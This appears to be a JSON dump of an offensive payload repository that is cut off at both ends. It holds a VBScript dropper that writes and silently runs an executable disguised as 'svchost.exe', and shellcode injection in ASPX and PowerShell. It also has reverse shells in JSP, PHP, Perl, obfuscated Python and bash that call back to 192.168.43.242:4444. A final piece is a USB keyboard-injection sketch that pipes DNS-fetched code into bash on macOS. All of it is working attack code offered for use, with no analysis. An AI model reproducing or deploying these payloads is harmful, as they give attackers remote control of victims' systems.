r(241)&Chr(188)&Chr(173)&Chr(37)&Chr(221)&Chr(26)&Chr(31)&Chr(84)&Chr(238)&Chr(157)&Chr(199)&Chr(120)&Chr(91)&Chr(225)&Chr(5)&Chr(31)&Chr(10)&Chr(219)&Chr(204)&Chr(108)&Chr(155)&Chr(127)&Chr(39)&Chr(88)&Chr(134)&Chr(129)&Chr(19)&Chr(194)&Chr(11)&Chr(240)&Chr(249)&Chr(170)&Chr(241)&Chr(5)&Chr(14)&Chr(129)&Chr(194)&Chr(252)&Chr(200)&Chr(217)&Chr(159)&Chr(63)&Chr(87)&Chr(184)&Chr(192)&Chr(228)&Chr(228)&Chr(92)&Chr(81)&Chr(6)&Chr(134)&Chr(75)&Chr(100)&Chr(5)&Chr(82)&Chr(190)&Chr(9)&Chr(56)&Chr(57)&Chr(39)&Chr(216)&Chr(46)&Chr(196)&Chr(16)&Chr(98)&Chr(254)&Chr(2
02)&Chr(198)&Chr(152)\nwvWPLP=wvWPLP&Chr(9)&Chr(50)&Chr(127)&Chr(59)&Chr(110)&Chr(116)&Chr(183)&Chr(217)&Chr(156)&Chr(18)&Chr(89)&Chr(31)&Chr(125)&Chr(213)&Chr(50)&Chr(7)&Chr(101)&Chr(198)&Chr(100)&Chr(74)&Chr(76)&Chr(70)&Chr(58)&Chr(103)&Chr(176)&Chr(46)&Chr(200)&Chr(249)&Chr(201)&Chr(97)&Chr(164)&Chr(16)&Chr(103)&Chr(74)&Chr(228)&Chr(3)&Chr(9)&Chr(79)&Chr(242)&Chr(107)&Chr(170)&Chr(26)&Chr(33)&Chr(146)&Chr(233)&Chr(7)&Chr(60)&Chr(46)&Chr(65)&Chr(90)&Chr(221)&Chr(46)&Chr(219)&Chr(44)&Chr(179)&Chr(172)&Chr(3)&Chr(249)&Chr(141)&Chr(189)&Chr(39)&Chr(111)&Chr(247)&Chr(61)&Chr(0)&Chr(117)&Chr(231)&Chr(102)&Chr(220)&Chr(153)&Chr(159)&Chr(202)&Chr(12)&Chr(128)&Chr(217)&Chr(19)&Chr(192)&Chr(92)&Chr(69)&Chr(208)&Chr(147)&Chr(207)&Chr(9)&Chr(179)&Chr(79)&Chr(241)&Chr(130)&Chr(183)&Chr(33)&Chr(13)&Chr(18)&Chr(100)&Chr(7)&Chr(172)&Chr(167)&Chr(181)&Chr(71)&Chr(206)&Chr(4)&Chr(107)\nwvWPLP=wvWPLP&Chr(68)&Chr(128)&Chr(22)&Chr(254)&Chr(150)&Chr(203)&Chr(239)&Chr(109)&Chr(183)&Chr(45)&Chr(227)&Chr(28)&Chr(107)&Chr(108)&Chr(162)&Chr(91)&Chr(89)&Chr(226)&Chr(74)&Chr(50)&Chr(23)&Chr(245)&Chr(117)&Chr(198)&Chr(197)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr
(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(44)&Chr(48)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(84)&Chr(48)&Chr(0)&Chr(0)&Chr(56)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(156)&Chr(0)&Chr(69)&Chr(120)&Chr(105)&Chr(116)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(75)&Chr(69)&Chr(82)&Chr(78)&Chr(69)&Chr(76)&Chr(51)&Chr(50)&Chr(46)&Chr(100)&Chr(108)&Chr(108)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Ch
r(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(185)&Chr(103)&Chr(193)&Chr(128)&Chr(176)&Chr(186)&Chr(49)&Chr(120)&Chr(24)&Chr(106)&Chr(53)&Chr(29)&Chr(169)&Chr(185)&Chr(208)&Chr(31)&Chr(12)&Chr(231)&Chr(176)&Chr(241)&Chr(95)&Chr(233)&Chr(122)&Chr(216)&Chr(214)&Chr(95)&Chr(138)&Chr(162)&Chr(8)&Chr(132)&Chr(52)&Chr(206)&Chr(221)&Chr(247)&Chr(244)&Chr(26)&Chr(119)&Chr(198)&Chr(248)&Chr(96)&Chr(87)&Chr(252)&Chr(214)&Chr(57)&Chr(25)&Chr(230)&Chr(218)&Chr(128)&Chr(175)&Chr(68)&Chr(75)&Chr(198)&Chr(17)&Chr(115)&Chr(145)&Chr(37)&Chr(148)&Chr(52)&Chr(106)&Chr(150)&Chr(
9)&Chr(6)&Chr(168)\n\t\tDim eyulDLCNyPhly\n\t\tSet eyulDLCNyPhly = CreateObject(\"Scripting.FileSystemObject\")\n\t\tDim ztgykKkZMO\n\t\tDim IxLPuRIJZ\n\t\tDim sBpfsVCwFv\n\t\tDim KIymDWTNS\n\t\tSet IxLPuRIJZ = eyulDLCNyPhly.GetSpecialFolder(2)\n\t\tKIymDWTNS = IxLPuRIJZ & \"\\\" & eyulDLCNyPhly.GetTempName()\n\t\teyulDLCNyPhly.CreateFolder(KIymDWTNS)\n\t\tsBpfsVCwFv = KIymDWTNS & \"\\\" & \"svchost.exe\"\n\t\tSet ztgykKkZMO = eyulDLCNyPhly.CreateTextFile(sBpfsVCwFv,2,0)\n\t\tztgykKkZMO.Write wvWPLP\n\t\tztgykKkZMO.Close\n\t\tDim iRUzZUgWeAViBB\n\t\tSet iRUzZUgWeAViBB = CreateObject(\"Wscript.Shell\")\n\t\tiRUzZUgWeAViBB.run sBpfsVCwFv, 0, false\n\tEnd Sub\n\n\tgJjCrDeBtLBn\n%>\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.aspx",
    "content": "<%@ Page Language=\"C#\" AutoEventWireup=\"true\" %>\n<%@ Import Namespace=\"System.IO\" %>\n<script runat=\"server\">\n    private static Int32 MEM_COMMIT=0x1000;\n    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;\n\n    [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);\n\n    [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);\n\n    protected void Page_Load(object sender, EventArgs e)\n    {\n        byte[] cm4LyzU5U = new byte[341] {\n0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,\n0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,\n0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,\n0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,\n0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,\n0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,\n0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,\n0x68,0xc0,0xa8,0x2b,0xf2,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,\n0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,\n0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd
5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,\n0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,\n0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,\n0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,\n0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };\n\n        IntPtr lyJHQJZlCdU = VirtualAlloc(IntPtr.Zero,(UIntPtr)cm4LyzU5U.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n        System.Runtime.InteropServices.Marshal.Copy(cm4LyzU5U,0,lyJHQJZlCdU,cm4LyzU5U.Length);\n        IntPtr yfjmxMfZtg = IntPtr.Zero;\n        IntPtr eKHXA = CreateThread(IntPtr.Zero,UIntPtr.Zero,lyJHQJZlCdU,IntPtr.Zero,0,ref yfjmxMfZtg);\n    }\n</script>\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.jsp",
    "content": "<%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\n  class StreamConnector extends Thread\n  {\n    InputStream ck;\n    OutputStream zl;\n\n    StreamConnector( InputStream ck, OutputStream zl )\n    {\n      this.ck = ck;\n      this.zl = zl;\n    }\n\n    public void run()\n    {\n      BufferedReader ov  = null;\n      BufferedWriter hgi = null;\n      try\n      {\n        ov  = new BufferedReader( new InputStreamReader( this.ck ) );\n        hgi = new BufferedWriter( new OutputStreamWriter( this.zl ) );\n        char buffer[] = new char[8192];\n        int length;\n        while( ( length = ov.read( buffer, 0, buffer.length ) ) > 0 )\n        {\n          hgi.write( buffer, 0, length );\n          hgi.flush();\n        }\n      } catch( Exception e ){}\n      try\n      {\n        if( ov != null )\n          ov.close();\n        if( hgi != null )\n          hgi.close();\n      } catch( Exception e ){}\n    }\n  }\n\n  try\n  {\n    String ShellPath;\nif (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {\n  ShellPath = new String(\"/bin/sh\");\n} else {\n  ShellPath = new String(\"cmd.exe\");\n}\n\n    Socket socket = new Socket( \"192.168.43.242\", 4444 );\n    Process process = Runtime.getRuntime().exec( ShellPath );\n    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\n    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\n  } catch( Exception e ) {}\n%>\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.php",
    "content": "/*<?php /**/ error_reporting(0); $ip = '192.168.43.242'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f(\"tcp://{$ip}:{$port}\"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\"Nlen\", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();"
  },
  {
    "path": "MSF_Trojanlinkage/shell.pl",
    "content": "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"192.168.43.242:4444\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
  },
  {
    "path": "MSF_Trojanlinkage/shell.psl",
    "content": "function yI6 {\n\tParam ($pwJF, $eI)\t\t\n\t$pk1l = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t\n\treturn $pk1l.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($pk1l.GetMethod('GetModuleHandle')).Invoke($null, @($pwJF)))), $eI))\n}\n\nfunction jQhd {\n\tParam (\n\t\t[Parameter(Position = 0, Mandatory = $True)] [Type[]] $iis,\n\t\t[Parameter(Position = 1)] [Type] $fM = [Void]\n\t)\n\t\n\t$ndG = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t$ndG.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $iis).SetImplementationFlags('Runtime, Managed')\n\t$ndG.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $fM, $iis).SetImplementationFlags('Runtime, Managed')\n\t\n\treturn $ndG.CreateType()\n}\n\n[Byte[]]$iLgSz = [System.Convert]::FromBase64String(\"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\")\n\t\t\n$zpx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll VirtualAlloc), (jQhd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $iLgSz.Length,0x3000, 0x40)\n[System.Runtime.InteropServices.Marshal]::Copy($iLgSz, 0, $zpx, $iLgSz.length)\n\n$sSYR = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll CreateThread), (jQhd @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) 
([IntPtr]))).Invoke([IntPtr]::Zero,0,$zpx,[IntPtr]::Zero,0,[IntPtr]::Zero)\n[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll WaitForSingleObject), (jQhd @([IntPtr], [Int32]))).Invoke($sSYR,0xffffffff) | Out-Null\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.py",
    "content": "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguNDMuMjQyJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))"
  },
  {
    "path": "MSF_Trojanlinkage/shell.sh",
    "content": "0<&202-;exec 202<>/dev/tcp/192.168.43.242/4444;sh <&202 >&202 2>&202"
  },
  {
    "path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (dns_shell).ino",
    "content": "\nvoid setup()\n{\n  delay(5000);\n  run(\"terminal\");\n  delay(3000);\n  Keyboard.print(\"nslookup -querytype=txt INPUT0 |\");\n  delay(200);\n  Keyboard.print(\" INPUT0 |\");\n  delay(200);\n  Keyboard.print(\"grep text | cut -d \\\" \\\" -f3-\");\n  delay(200);\n  Keyboard.print(\" | tr -d \\\"\\\\\\\"\\\" | base64 -D\");\n  delay(200);\n  Keyboard.println(\" | /bin/bash\");\n  \n}\n\nvoid loop()\n{\n   \n}\n\nvoid run(char *SomeCommand){\n  \n  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n  Keyboard.set_key1(KEY_SPACE);\n  Keyboard.send_now();\n\n  delay(500);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n\n  Keyboard.print(SomeCommand);\n  Keyboard.set_key1(KEY_ENTER);\n  Keyboard.send_now();\n\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n}\n\n"
  },
  {
    "path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (perl_shell).ino",
